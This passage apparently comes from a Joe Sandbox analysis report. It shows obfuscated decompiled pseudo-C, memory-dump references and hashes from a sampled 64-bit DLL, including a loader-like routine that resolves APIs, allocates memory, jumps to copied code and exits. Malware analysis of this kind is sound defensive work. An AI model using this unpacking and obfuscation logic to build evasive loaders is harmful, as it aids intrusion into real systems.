                          0x7ff88c07b199
                          0x7ff88c07b1a1
                          0x7ff88c07b1af
                          0x7ff88c07b1b6
                          0x7ff88c07b1ba
                          0x7ff88c07b1c1
                          0x7ff88c07b1c6
                          0x7ff88c07b1cc
                          0x7ff88c07b1d1
                          0x7ff88c07b1d7
                          0x7ff88c07b1dc
                          0x7ff88c07b1e3
                          0x7ff88c07b1ed
                          0x7ff88c07b1f1
                          0x7ff88c07b1ff
                          0x7ff88c07b204
                          0x7ff88c07b21e
                          0x7ff88c07b239
                          0x7ff88c07b243
                          0x7ff88c07b249
                          0x7ff88c07b24c
                          0x7ff88c07b24f
                          0x7ff88c07b258
                          0x7ff88c07b25b
                          0x7ff88c07b276
                          0x7ff88c07b28e
                          0x7ff88c07b299
                          0x7ff88c07b2a0
                          0x7ff88c07b2a7
                          0x7ff88c07b2ad
                          0x7ff88c07b2b1
                          0x7ff88c07b2b6
                          0x7ff88c07b2bb
                          0x7ff88c07b2ca
                          0x7ff88c07b2e0
                          0x7ff88c07b2e2
                          0x7ff88c07b2ea
                          0x7ff88c07b2f9
                          0x7ff88c07b2fe
                          0x7ff88c07b306
                          0x7ff88c07b30c
                          0x7ff88c07b352
                          0x7ff88c07b356
                          0x7ff88c07b36d
                          0x7ff88c07b372
                          0x7ff88c07b398

                          APIs
                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00007FF88C07B372
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID:
                          • API String ID: 32694325-0
                          • Opcode ID: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                          • Instruction ID: d5f4c7588a5110d9968ed35257de727d051ace862d1c3e5989a66e3e7d380e8d
                          • Opcode Fuzzy Hash: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                          • Instruction Fuzzy Hash: 2ED15C736082C58BC765CF15E480BDEBBA4F788788F144126EB8967B58DB38EA55CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E00007FF87FF88C07A4F0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                          				void* __r12;
                          				void* __r13;
                          				void* __r14;
                          				signed int _t153;
                          				intOrPtr _t185;
                          				signed int _t194;
                          				void* _t204;
                          				signed int _t215;
                          				intOrPtr _t216;
                          				long long _t221;
                          				intOrPtr _t222;
                          				void* _t232;
                          				long long _t236;
                          				void* _t239;
                          				void* _t240;
                          				void* _t243;
                          				struct _CRITICAL_SECTION* _t245;
                          				void* _t247;
                          				void* _t249;
                          				long long _t250;
                          				signed int _t251;
                          				void* _t253;
                          
                          				_t243 = __r9;
                          				_t231 = __rdx;
                          				_t204 = __rax;
                          				 *((long long*)(_t239 + 0x10)) = __rbx;
                          				 *((long long*)(_t239 + 0x18)) = _t236;
                          				 *((long long*)(_t239 + 0x20)) = __rsi;
                          				_push(_t232);
                          				_t240 = _t239 - 0x90;
                          				r13d =  *(_t240 + 0x110);
                          				r11d = __rcx + 0x7bc;
                          				r14d =  *(_t240 + 0x120);
                          				r8d =  *(_t240 + 0xe0);
                          				r9d = _t247 + 0x1137;
                          				r15d = _t247 - 0x21a;
                          				r12d =  *(_t240 + 0xf8);
                          				 *(_t240 + 0x80) = r15d;
                          				 *(_t240 + 0x120) =  *(_t240 + 0xe8) + 0x40c;
                          				r10d = _t247 + 0xf35;
                          				 *(_t240 + 0x110) = r10d;
                          				 *(_t240 + 0xc0) = r11d;
                          				r12d = r12d + 0xffffefef;
                          				if (__r8 - 0x40c - __r9 - 0x17e6 < 0) goto 0x8c07a883;
                          				if (r12d - __rcx - 0x1157 <= 0) goto 0x8c07a789;
                          				 *((intOrPtr*)(_t240 + 0x60)) = __rdx + 0x2103;
                          				r10d = _t232 + 0x38e9;
                          				_t250 =  *((intOrPtr*)(_t240 + 0x108));
                          				 *((long long*)(_t240 + 0x58)) = _t250;
                          				r11d = _t253 + 0x114f;
                          				 *(_t240 + 0x50) = r10d;
                          				r9d = __r8 - 0xde7;
                          				 *(_t240 + 0x48) = r11d;
                          				r8d = __rdx + 0x343a;
                          				 *(_t240 + 0x40) = _t236 + 0x37e1;
                          				 *(_t240 + 0x38) = _t249 - 0x30d5 + 0x27b2;
                          				 *(_t240 + 0x30) = _t236 + 0x2103;
                          				 *(_t240 + 0x28) = __rcx + 0x2b1;
                          				 *(_t240 + 0x20) = r13d;
                          				E00007FF87FF88C0711F0(__rcx, __rdx, __rsi, _t236, __r8, _t245, _t247, _t250); // executed
                          				r9d =  *(_t240 + 0x110);
                          				r9d = r9d + 0xffffeeb1;
                          				 *((long long*)(_t250 + 0x158)) =  *((intOrPtr*)(_t250 + 0x350));
                          				_t49 = _t204 - 0x814; // -2068
                          				_t153 = _t49;
                          				_t51 = _t204 - 0x108; // -264
                          				r10d = _t51;
                          				_t53 = _t231 - 0x113b; // -4411
                          				_t185 = _t53;
                          				 *(_t240 + 0x78) = r10d;
                          				_t55 = _t231 - 0x4af; // -1199
                          				r8d = _t55;
                          				_t221 =  *((intOrPtr*)(_t250 + 0xe0)) + 0x3595;
                          				_t194 =  *(_t240 + 0xe0) + 0x24c;
                          				 *((long long*)(_t250 + 0x58)) = _t221;
                          				r14d =  *(_t240 + 0xc0);
                          				r13d =  *(_t240 + 0xe8);
                          				r11d = _t221 - 0x202;
                          				 *(_t240 + 0x70) = r11d;
                          				 *(_t240 + 0x68) = _t153;
                          				r15d = _t221 - 0x113b;
                          				_t215 =  *((intOrPtr*)(_t240 + 0x108));
                          				r12d = _t221 - 0x760;
                          				 *((intOrPtr*)(_t240 + 0x60)) = _t204 - 0x1563;
                          				 *((intOrPtr*)(_t240 + 0x58)) = _t185;
                          				r14d = r14d + 0xffffe5d9;
                          				 *(_t240 + 0x50) = _t194;
                          				r13d = r13d + 0x2b1;
                          				 *(_t240 + 0x48) = r14d;
                          				 *(_t240 + 0x40) = r15d;
                          				 *(_t240 + 0x38) = _t215;
                          				 *(_t240 + 0x30) = r12d;
                          				 *(_t240 + 0x28) =  *(_t240 + 0x120) + 0xfffff21d;
                          				 *(_t240 + 0x20) = r13d;
                          				E00007FF87FF88C08E7E0(_t221, __rdx, __r8, _t243, _t253, _t249, _t247);
                          				_t222 =  *((intOrPtr*)(_t215 + 0xd0));
                          				r15d =  *(_t240 + 0x80);
                          				 *((short*)(_t215 + 0xf8)) =  *(_t222 + 6) & 0x0000ffff;
                          				 *((long long*)(_t215 + 0x108)) = _t222 + 0x108;
                          				 *((intOrPtr*)(_t215 + 0x100)) =  *((intOrPtr*)(_t215 + 0x100)) + _t222 -  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x1a0)) + 0x100));
                          				goto 0x8c07a93e;
                          				_t216 =  *((intOrPtr*)(_t240 + 0x108));
                          				if (r15d - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) < 0) goto 0x8c07a93e;
                          				r14d = 0x228c;
                          				r10d = r10d ^ 0x000038e9;
                          				 *(_t240 + 0x110) = r10d;
                          				asm("o16 nop [eax+eax]");
                          				r8d = r10d;
                          				r8d = r8d *  *(_t216 + 0x120);
                          				 *(_t240 + 0x20) = _t194 * r9d;
                          				r9d = ( *(_t216 + 0x228) & 0x0000ffff) * (r8w & 0xffffffff) & 0x0000ffff;
                          				r9d = r9d * (r11w & 0xffffffff);
                          				EnterCriticalSection(_t245);
                          				r8d =  *(_t240 + 0xe0);
                          				r10d =  *(_t240 + 0x110);
                          				r11d =  *(_t240 + 0xc0);
                          				 *(_t216 + 0xe0) =  *(_t216 + 0xe0) | _t185 - (r12d -  *((intOrPtr*)(_t216 + 0x110)) & r15d) ^  *(_t216 + 0x1f8) ^  *(_t216 + 0x1c0);
                          				if (r15d + 1 - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) >= 0) goto 0x8c07a7d0;
                          				goto 0x8c07a93e;
                          				_t251 =  *((intOrPtr*)(_t240 + 0x108));
                          				if (r15d -  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153 <= 0) goto 0x8c07a93e;
                          				r11d =  *(_t251 + 0x120);
                          				r11d = r11d | r8d;
                          				r10d =  *(_t251 + 0x78);
                          				r9d =  *_t251;
                          				r10d = r10d +  *((intOrPtr*)(_t251 + 0x18));
                          				r9d = r9d - ( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8));
                          				r8d =  *(_t240 + 0xc0);
                          				r10d = r10d | 0x00003666;
                          				 *(_t240 + 0x48) =  *(_t251 + 0x48) * 0x36e7;
                          				 *(_t240 + 0x40) = ( *(_t251 + 0x100) | 0x00003666) ^  *(_t251 + 0x1b0);
                          				 *(_t240 + 0x38) = r11d;
                          				r12d = r12d * (__r8 - 0x40c);
                          				 *(_t240 + 0x30) = _t251;
                          				 *(_t240 + 0x28) =  *(_t251 + 0xf0) & r8d;
                          				 *(_t240 + 0x20) = r10d;
                          				r8d = r8d + r12d;
                          				E00007FF87FF88C08D230(( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8)) -  *_t251 ^  *(_t251 + 0x188), r15d, _t216,  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153, __rdx);
                          				return _t253 + 0x216;
                          			}

























                          0x7ff88c07a4f0
                          0x7ff88c07a4f0
                          0x7ff88c07a4f0
                          0x7ff88c07a4f0
                          0x7ff88c07a4f5
                          0x7ff88c07a4fa
                          0x7ff88c07a4ff
                          0x7ff88c07a508
                          0x7ff88c07a50f
                          0x7ff88c07a517
                          0x7ff88c07a51e
                          0x7ff88c07a526
                          0x7ff88c07a53c
                          0x7ff88c07a54a
                          0x7ff88c07a551
                          0x7ff88c07a565
                          0x7ff88c07a56d
                          0x7ff88c07a574
                          0x7ff88c07a582
                          0x7ff88c07a590
                          0x7ff88c07a5a5
                          0x7ff88c07a5bc
                          0x7ff88c07a5cb
                          0x7ff88c07a5d7
                          0x7ff88c07a5db
                          0x7ff88c07a601
                          0x7ff88c07a609
                          0x7ff88c07a60e
                          0x7ff88c07a615
                          0x7ff88c07a61a
                          0x7ff88c07a621
                          0x7ff88c07a626
                          0x7ff88c07a634
                          0x7ff88c07a638
                          0x7ff88c07a63c
                          0x7ff88c07a640
                          0x7ff88c07a644
                          0x7ff88c07a649
                          0x7ff88c07a657
                          0x7ff88c07a666
                          0x7ff88c07a66d
                          0x7ff88c07a674
                          0x7ff88c07a674
                          0x7ff88c07a681
                          0x7ff88c07a681
                          0x7ff88c07a68f
                          0x7ff88c07a68f
                          0x7ff88c07a695
                          0x7ff88c07a69a
                          0x7ff88c07a69a
                          0x7ff88c07a6a1
                          0x7ff88c07a6a8
                          0x7ff88c07a6ae
                          0x7ff88c07a6b8
                          0x7ff88c07a6c7
                          0x7ff88c07a6cf
                          0x7ff88c07a6d6
                          0x7ff88c07a6e1
                          0x7ff88c07a6e5
                          0x7ff88c07a6ec
                          0x7ff88c07a6f4
                          0x7ff88c07a6fb
                          0x7ff88c07a704
                          0x7ff88c07a708
                          0x7ff88c07a70f
                          0x7ff88c07a713
                          0x7ff88c07a71a
                          0x7ff88c07a725
                          0x7ff88c07a72a
                          0x7ff88c07a72f
                          0x7ff88c07a734
                          0x7ff88c07a738
                          0x7ff88c07a73d
                          0x7ff88c07a742
                          0x7ff88c07a749
                          0x7ff88c07a755
                          0x7ff88c07a763
                          0x7ff88c07a77d
                          0x7ff88c07a784
                          0x7ff88c07a789
                          0x7ff88c07a7a8
                          0x7ff88c07a7b2
                          0x7ff88c07a7b8
                          0x7ff88c07a7bf
                          0x7ff88c07a7ca
                          0x7ff88c07a7f0
                          0x7ff88c07a7f3
                          0x7ff88c07a802
                          0x7ff88c07a807
                          0x7ff88c07a816
                          0x7ff88c07a81e
                          0x7ff88c07a824
                          0x7ff88c07a837
                          0x7ff88c07a842
                          0x7ff88c07a85d
                          0x7ff88c07a878
                          0x7ff88c07a87e
                          0x7ff88c07a883
                          0x7ff88c07a8a4
                          0x7ff88c07a8c6
                          0x7ff88c07a8da
                          0x7ff88c07a8e4
                          0x7ff88c07a8eb
                          0x7ff88c07a8ee
                          0x7ff88c07a8f2
                          0x7ff88c07a8f5
                          0x7ff88c07a8fd
                          0x7ff88c07a915
                          0x7ff88c07a919
                          0x7ff88c07a91d
                          0x7ff88c07a922
                          0x7ff88c07a928
                          0x7ff88c07a92d
                          0x7ff88c07a931
                          0x7ff88c07a936
                          0x7ff88c07a939
                          0x7ff88c07a965

                          APIs
                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF88C07A81E
                            • Part of subcall function 00007FF88C0711F0: GetProcessHeap.KERNEL32 ref: 00007FF88C071490
                            • Part of subcall function 00007FF88C0711F0: HeapFree.KERNEL32 ref: 00007FF88C0714A3
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$CriticalEnterFreeProcessSection
                          • String ID:
                          • API String ID: 427202882-0
                          • Opcode ID: 06d21744d6bd25f7f01f7bf7974a9ca1116d3c96e03c2e6b9feebbf35e4aacf2
                          • Instruction ID: 5640b216f3397f42093833fb30de9063076d5153c2b2f72bff5f79e8a979c5b8
                          • Opcode Fuzzy Hash: 06d21744d6bd25f7f01f7bf7974a9ca1116d3c96e03c2e6b9feebbf35e4aacf2
                          • Instruction Fuzzy Hash: DBB169731086C5CAC725CF15E444BEEB7A4F788B88F414125EB8A17B58DB78EA55CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00007FF87FF88C089610(signed int __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, signed int _a16, signed int _a32, signed int _a40, signed int _a64, signed int* _a72, signed int _a80, signed int _a96) {
                          				long long _v32;
                          				long long _v40;
                          				long long _v48;
                          				long long _v56;
                          				signed int _v64;
                          				signed int _v72;
                          				signed int _v80;
                          				signed int _v88;
                          				signed int* _v96;
                          				intOrPtr _v104;
                          				intOrPtr _v112;
                          				intOrPtr _v120;
                          				signed int _v128;
                          				signed int _v136;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t84;
                          				signed int _t88;
                          				signed int _t98;
                          				signed int _t103;
                          				signed int _t107;
                          				signed int _t117;
                          				signed int* _t124;
                          				signed long long _t129;
                          				void* _t135;
                          				void* _t136;
                          				void* _t137;
                          
                          				_t117 = __rax;
                          				_t88 = __r9 - 0xefd;
                          				r8d = _a80;
                          				_t98 = __rdx - 0x3189;
                          				r8d = r8d + 0xaeb;
                          				_t103 = _a64 + 0xffffeb3f;
                          				_a16 = _t98;
                          				r10d = __rax - 0xbf1;
                          				_a64 = _t103;
                          				_t107 = __rax + 0x8d0;
                          				_a80 = r10d;
                          				_a96 = _t107;
                          				_a32 = __r9 - 0x1086;
                          				_a40 = _t88;
                          				if (_t88 == __r10 + 0x216) goto 0x8c0898d3;
                          				_a8 = __rbx;
                          				_t124 = _a72;
                          				if (_t103 - __r10 + 0x114f >= 0) goto 0x8c089723;
                          				_v128 = 0x3189;
                          				r9d = 0x3a59;
                          				_v136 = 0x36e7;
                          				r8d = 0x2032;
                          				E00007FF87FF88C079AC0(_t124, __rcx, _t124, _t137); // executed
                          				_t124[0xdc] = _t117;
                          				_t124[0xcf] = 0;
                          				_t124[0x24] =  &(_t124[0x78]);
                          				 *((intOrPtr*)(_t124[0xc] + 0x100)) =  *((intOrPtr*)(_t124[0xc] + 0x100)) + _t124[0x44];
                          				_t124[0x44] = _t124[0x44] - 1;
                          				goto 0x8c0898b8;
                          				_v40 = __r13;
                          				_t129 =  *_t124 | _t98;
                          				if (_t124[0x54] != _t129) goto 0x8c0898cb;
                          				_v32 = __r12;
                          				_v48 = __r14;
                          				_v56 = __r15;
                          				asm("o16 nop [eax+eax]");
                          				if (r8d - _t129 < 0) goto 0x8c08987f;
                          				LeaveCriticalSection(??);
                          				r12d = _t124[0x32];
                          				r8d = r12d;
                          				_t84 = _a32;
                          				r8d = r8d & _t107;
                          				r9d = _t124[0x74];
                          				r11d = _t124[0x68];
                          				r9d = r9d | _t103;
                          				r11d = r11d | _t124[0x50];
                          				r12d = r12d ^ 0x00001f2c;
                          				r10d = _a64;
                          				r12d = r12d - _t84;
                          				r10d = r10d | 0x00002032;
                          				r11d = r11d - _t124[0x1e];
                          				r14d = _t124[0x78];
                          				r10d = r10d & _a80;
                          				r14d = r14d | _t84;
                          				r15d =  *_t124;
                          				r15d = r15d - _t124[0x16];
                          				r15d = r15d - 0x2103;
                          				_v64 = r11d;
                          				_v72 = r12d;
                          				_v80 = _t124[0x8a] ^ 0x00003666;
                          				_v88 = r10d;
                          				_v96 = _t124;
                          				_v104 = _t124[0x10] - r12d;
                          				_v112 = _t84 + 0x38e9;
                          				_v120 = _t124[0x54] * _a40 - _a96;
                          				_v128 = r14d;
                          				_v136 = r15d;
                          				r8d = E00007FF87FF88C07A4F0(r8d, _t124, _t129, _t124, _t136, __r8, __r9);
                          				_a80 = _a80 + _t124[0x1e] + _a96;
                          				r13d = r13d + 3;
                          				if (r13d == ( *_t124 | _a16)) goto 0x8c089760;
                          				return _t135 + 0x2103;
                          			}






























                          0x7ff88c089610
                          0x7ff88c089622
                          0x7ff88c089629
                          0x7ff88c089631
                          0x7ff88c08963e
                          0x7ff88c089645
                          0x7ff88c08964b
                          0x7ff88c089652
                          0x7ff88c089659
                          0x7ff88c089660
                          0x7ff88c089666
                          0x7ff88c089675
                          0x7ff88c08967c
                          0x7ff88c08968a
                          0x7ff88c089693
                          0x7ff88c0896a0
                          0x7ff88c0896a8
                          0x7ff88c0896b2
                          0x7ff88c0896b9
                          0x7ff88c0896c2
                          0x7ff88c0896c8
                          0x7ff88c0896cd
                          0x7ff88c0896db
                          0x7ff88c0896e0
                          0x7ff88c0896ee
                          0x7ff88c0896fc
                          0x7ff88c08970a
                          0x7ff88c089717
                          0x7ff88c08971e
                          0x7ff88c089729
                          0x7ff88c089731
                          0x7ff88c08973e
                          0x7ff88c089744
                          0x7ff88c08974c
                          0x7ff88c089751
                          0x7ff88c089756
                          0x7ff88c089772
                          0x7ff88c089778
                          0x7ff88c08977e
                          0x7ff88c089785
                          0x7ff88c089788
                          0x7ff88c08978f
                          0x7ff88c089792
                          0x7ff88c089799
                          0x7ff88c0897a0
                          0x7ff88c0897af
                          0x7ff88c0897be
                          0x7ff88c0897c5
                          0x7ff88c0897cd
                          0x7ff88c0897d6
                          0x7ff88c0897dd
                          0x7ff88c0897e7
                          0x7ff88c0897ee
                          0x7ff88c0897f6
                          0x7ff88c0897f9
                          0x7ff88c089801
                          0x7ff88c08980c
                          0x7ff88c089821
                          0x7ff88c089826
                          0x7ff88c08982b
                          0x7ff88c08982f
                          0x7ff88c08983b
                          0x7ff88c089840
                          0x7ff88c089844
                          0x7ff88c089848
                          0x7ff88c08984c
                          0x7ff88c089851
                          0x7ff88c08985e
                          0x7ff88c08986a
                          0x7ff88c089882
                          0x7ff88c089892
                          0x7ff88c0898ca

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CriticalLeaveSection
                          • String ID:
                          • API String ID: 3988221542-0
                          • Opcode ID: 7f6c8debec4568f5d663e6eb499fe9acf8493300617c6ca9c171ea6707587096
                          • Instruction ID: 7d4be62021b95eaec3c4171f0659ada3f625aec123386295cc8ac1428be28703
                          • Opcode Fuzzy Hash: 7f6c8debec4568f5d663e6eb499fe9acf8493300617c6ca9c171ea6707587096
                          • Instruction Fuzzy Hash: 6E6135736086C1CAD761CF25E4447DAB7A4F798B88F044139DB8957B58DB38E994CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E00007FF87FF88C074C80() {
                          				intOrPtr _t88;
                          				void* _t111;
                          				void* _t120;
                          				long long _t131;
                          				intOrPtr _t139;
                          				long long _t141;
                          				intOrPtr* _t142;
                          				void* _t143;
                          				intOrPtr _t146;
                          				intOrPtr _t149;
                          				void* _t151;
                          				void* _t156;
                          				void* _t158;
                          				void* _t159;
                          				void* _t160;
                          				void* _t161;
                          				void* _t162;
                          				intOrPtr _t163;
                          				void* _t166;
                          				long long _t167;
                          				signed long long _t168;
                          				int _t169;
                          				long _t171;
                          				void* _t172;
                          				struct HINSTANCE__* _t173;
                          
                          				 *((long long*)(_t160 + 0x20)) = _t141;
                          				_t161 = _t160 - 0x90;
                          				r9d =  *((intOrPtr*)(_t161 + 0xf8));
                          				r10d = _t162 - 0x1f2c;
                          				 *((intOrPtr*)(_t161 + 0xe0)) = _t151 + 0xe49;
                          				_t9 = _t143 + 0x18b5; // 0x37e1
                          				r14d = _t9;
                          				r11d = _t120 - 0x927;
                          				 *((intOrPtr*)(_t161 + 0xd0)) = r10d;
                          				r13d = _t120 - 0x11a9;
                          				 *((intOrPtr*)(_t161 + 0xd8)) = _t162 + 0x1669;
                          				r15d = _t120 - 0x30d5;
                          				 *((intOrPtr*)(_t161 + 0xf8)) = _t162 + 0x360;
                          				 *((intOrPtr*)(_t161 + 0x80)) = _t166 - 0x1b2d;
                          				 *((intOrPtr*)(_t161 + 0x110)) =  *((intOrPtr*)(_t161 + 0x118)) + 0xfa;
                          				r8d = _t151 + 0x522;
                          				 *((intOrPtr*)(_t161 + 0x118)) = _t166 - 0x1a27;
                          				if (r11d - _t141 + 0x354 > 0) goto 0x8c0755e4;
                          				_t142 =  *((intOrPtr*)(_t161 + 0x120));
                          				if (r8d == _t159 + 0x1408) goto 0x8c075576;
                          				r8d = 0x36e7;
                          				 *( *((intOrPtr*)(_t142 + 0x248)) + 4) =  *(_t142 + 0x130) ^ 0x506c4282;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x248)) + 8)) =  *((intOrPtr*)( *_t142 + 0xb0)) + 0x657447bf;
                          				 *( *((intOrPtr*)(_t142 + 0x248)) + 0xc) =  *( *((intOrPtr*)(_t142 + 0x1c8)) + 0x130) ^ 0x00005794;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1a0)) + 0x130)) + 0x12f0 == r8d) goto 0x8c074e0d;
                          				r8d = r8d + 1;
                          				 *( *((intOrPtr*)(_t142 + 0x40)) + 0x198) =  *( *((intOrPtr*)(_t142 + 0x40)) + 0x198) ^  *(_t142 + 0xc8) ^ 0x000030d5;
                          				_t131 = r8d;
                          				if (_t131 != _t151) goto 0x8c074dd0;
                          				GetProcAddress(_t173);
                          				_t163 =  *((intOrPtr*)(_t142 + 0xc0));
                          				r10d = 0x3666;
                          				 *((long long*)(_t142 + 0x1d8)) = _t131;
                          				 *(_t142 + 0x28) =  *(_t142 + 0x1f8) ^ _t168;
                          				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x118)) + 0x88 +  *(_t142 + 0x268) * 8));
                          				_t167 = _t166 + _t163;
                          				 *((long long*)(_t142 + 0x2b0)) = _t167;
                          				if (_t167 == _t163) goto 0x8c0750e2;
                          				_t146 =  *_t142;
                          				 *((long long*)(_t142 + 0x18)) =  *((intOrPtr*)(_t146 + 0x120)) - 0x27ae;
                          				_t60 = _t146 - 0x2598; // -4517
                          				 *(_t142 + 0x70) =  *(_t142 + 0x70) | _t60;
                          				_t139 =  *((intOrPtr*)(_t142 + 0x1a0));
                          				_t65 = _t146 + 4; // 0x4
                          				r9d = _t65;
                          				r8d =  *(_t139 + 0x130) * 0x38dc7000;
                          				VirtualAlloc(_t172, _t171);
                          				if (_t139 == 0) goto 0x8c0750e2;
                          				E00007FF87FF88C07BFF0(0, _t151 + 0xe49, _t166 - 0x1b2d, _t111, _t139,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)))), _t139, _t158,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)))));
                          				 *((long long*)(_t142 + 0x1e0)) = 0x3cfb;
                          				_t88 =  *((intOrPtr*)(_t142 + 0x2b8))(_t156, _t158, _t159);
                          				_t149 =  *((intOrPtr*)(_t142 + 0x1c8));
                          				 *((intOrPtr*)(_t142 + 0x2c0)) = _t88;
                          				if (_t88 !=  *((intOrPtr*)(_t149 + 0x150)) - 0x23f8) goto 0x8c074f46;
                          				 *((long long*)(_t142 + 0xa0)) = 0;
                          				 *(_t142 + 0x10) =  *(_t142 + 0x10) | _t149 + 0x000030d5;
                          				ExitProcess(_t169);
                          			}




























                          0x7ff88c074c80
                          0x7ff88c074c90
                          0x7ff88c074ca5
                          0x7ff88c074cad
                          0x7ff88c074cc2
                          0x7ff88c074cc9
                          0x7ff88c074cc9
                          0x7ff88c074cd0
                          0x7ff88c074cd7
                          0x7ff88c074cdf
                          0x7ff88c074ce6
                          0x7ff88c074ced
                          0x7ff88c074cfb
                          0x7ff88c074d1c
                          0x7ff88c074d23
                          0x7ff88c074d2a
                          0x7ff88c074d37
                          0x7ff88c074d41
                          0x7ff88c074d47
                          0x7ff88c074d58
                          0x7ff88c074d65
                          0x7ff88c074d77
                          0x7ff88c074d90
                          0x7ff88c074dad
                          0x7ff88c074dc6
                          0x7ff88c074dd4
                          0x7ff88c074deb
                          0x7ff88c074e05
                          0x7ff88c074e0b
                          0x7ff88c074e1b
                          0x7ff88c074e21
                          0x7ff88c074e28
                          0x7ff88c074e2e
                          0x7ff88c074e3f
                          0x7ff88c074e5d
                          0x7ff88c074e65
                          0x7ff88c074e68
                          0x7ff88c074e72
                          0x7ff88c074e78
                          0x7ff88c074e88
                          0x7ff88c074e8c
                          0x7ff88c074e93
                          0x7ff88c074e9d
                          0x7ff88c074ea7
                          0x7ff88c074ea7
                          0x7ff88c074eab
                          0x7ff88c074eb6
                          0x7ff88c074ec2
                          0x7ff88c074edc
                          0x7ff88c074ee1
                          0x7ff88c074eec
                          0x7ff88c074ef2
                          0x7ff88c074ef9
                          0x7ff88c074f0d
                          0x7ff88c074f0f
                          0x7ff88c074f2f
                          0x7ff88c074f3f

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
